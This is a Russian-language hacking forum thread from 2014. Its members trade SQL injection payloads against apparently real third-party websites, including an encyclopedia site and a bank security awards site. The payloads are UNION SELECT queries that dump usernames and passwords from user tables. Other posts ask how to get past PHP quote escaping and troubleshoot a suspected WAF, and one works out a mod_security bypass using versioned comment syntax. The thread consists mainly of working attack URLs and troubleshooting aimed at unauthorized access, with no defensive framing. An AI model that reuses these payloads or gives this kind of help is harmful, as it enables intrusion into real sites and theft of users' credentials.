 |
|
11.08.2014, 11:55
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
начал раскручивать скулю.. и столкнулся с такой проблемой
нашел 3 интерисующих меня стобца:
usr_login
usr_name
usr_pass
При запросе:
Код:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_pass),3,4,5,6,7,8,9,10+from+user+--+
Ничего не выводит.
А при запросе:
Код:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_name),3,4,5,6,7,8,9,10+from+user+--+
Выводит имя и логин пользователей(включая админа).
Вопрос: Получается вывод паролей как-то защищен? Как вывести пароль? |
|
|
11.08.2014, 12:28
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Сообщение от Shade
начал раскручивать скулю.. и столкнулся с такой проблемой
нашел 3 интерисующих меня стобца:
usr_login
usr_name
usr_pass
При запросе:
Код:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_pass),3,4,5,6,7,8,9,10+from+user+--+
Ничего не выводит.
А при запросе:
Код:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_name),3,4,5,6,7,8,9,10+from+user+--+
Выводит имя и логин пользователей(включая админа).
Вопрос: Получается вывод паролей как-то защищен? Как вывести пароль? Колонка usr_pass просто пуста.
|
|
|
|
11.08.2014, 22:05
|
|
Новичок
Регистрация: 29.09.2010
Сообщений: 8
С нами:
8220566
Репутация:
1
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_reverse[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"\x22"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\x22"[/COLOR][COLOR="#007700"])+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]))));[/COLOR][/COLOR]
и далее
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]UPDATE users SET data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'$data[1]'[/COLOR][/COLOR]
Есть вариант пихнуть что-то такое, чтобы можно было обойти экранирование кавычек и провести SQL-инжект? |
|
|
|
12.08.2014, 04:59
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Есть одна инъекция.
Код:
/-1'+union+select+1,2,3,4,user(),6,7,8,9,10+--+
Отлично выводит пользователя.
Код:
-1'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql.user+--+
Ответ - 404 Not Found
Тогда я подумал подставить валидное значение
Код:
-45742'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql.user+--+
Ответ - 404 Not Found
Все дальнейшие запросы кроме user(), database(), version() отвечают ошибкой 404.
Тогда я подумал что это WAF. И загрязнил запрос стандартными комментариями.
Ответ - 404 Not Found
Вообще любые запросы отвечают 404.
Что это может быть? |
|
|
|
12.08.2014, 09:22
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от MaxFast
Есть одна инъекция.
Код:
/-1'+union+select+1,2,3,4,user(),6,7,8,9,10+--+
Отлично выводит пользователя.
Код:
-1'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql.user+--+
Ответ - 404 Not Found
Тогда я подумал подставить валидное значение
Код:
-45742'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql.user+--+
Ответ - 404 Not Found
Все дальнейшие запросы кроме user(), database(), version() отвечают ошибкой 404.
Тогда я подумал что это WAF. И загрязнил запрос стандартными комментариями.
Ответ - 404 Not Found
Вообще любые запросы отвечают 404.
Что это может быть? Попробуй использовать подзапросы.
|
|
|
|
12.08.2014, 09:46
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Сообщение от kingbeef
Попробуй использовать подзапросы.
Может быть, конечно, криво использовал select и подзапросы, но всё равно ответ был 404.
Код:
http://www.awards.ib-bank.ru/participant/-1'+union+select+1,2,3,4,5,6,7,8,9,10+--+
В общем вот инъекция сама. Тут вывод полей как видно.
Я первый раз сталкиваюсь с этим.
Конечно это может быть и WAF'ом, которому и комментарии нипочем (Всё-таки сайт посвящён ИБ банков).
|
|
|
|
12.08.2014, 10:57
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Такой вопрос.. хотел посмотреть как работает сканер Jsky, ввел сайт, все норм.. вообщем он насканил file backup check, искал на форуме ну ничего не нашел((( хотел бы попросить ссылочку (если такова имеется) где было бы про эту уязвимость побольше информации и чтоб было написанно как её использовать..хотябы вкраце. Буду очень благодарен
|
|
|
|
12.08.2014, 11:22
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Сообщение от Shade
Такой вопрос.. хотел посмотреть как работает сканер Jsky, ввел сайт, все норм.. вообщем он насканил
file backup check
, искал на форуме ну ничего не нашел((( хотел бы попросить ссылочку (если такова имеется) где было бы про эту уязвимость побольше информации и чтоб было написанно как её использовать..хотябы вкраце. Буду очень благодарен
Ничего примечательного. Возможно бэкап файла обыкновенный.
|
|
|
|
14.08.2014, 20:27
|
|
Познающий
Регистрация: 09.10.2011
Сообщений: 55
С нами:
7680566
Репутация:
1
|
|
Мужики, такой вопрос.
Вроде бы обошел mod_security, в итоге такой запрос:
http://www.xxxxx.com/checkout.php?id=-39+/*!50000UNION*/+/*!50000SELECT*/+1,table_name,3,4,5,6,7,8,9,10,11+/*5000FROM*/+information_schema,tables+/*50000LIMIT*/+0,1--
Выдает ошибку "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0,1--' at line 1"
Что я неправильно сделал?
|
|
|
|
14.08.2014, 22:35
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Сообщение от billybonse
Мужики, такой вопрос.
Вроде бы обошел mod_security, в итоге такой запрос:
http://www.xxxxx.com/checkout.php?id=-39+/*!50000UNION*/+/*!50000SELECT*/+1,table_name,3,4,5,6,7,8,9,10,11+/*5000FROM*/+information_schema,tables+/*50000LIMIT*/+0,1--
Выдает ошибку "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0,1--' at line 1"
Что я неправильно сделал?
http://www.xxxxx.com/checkout.php?id=-39+/*!50000UNION*/+/*!50000SELECT*/+1,table_name,3,4,5,6,7,8,9,10,11+/*5000FROM*/+information_schema ,tables+/*50000LIMIT*/+0,1--
Запятая вместо точки.
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
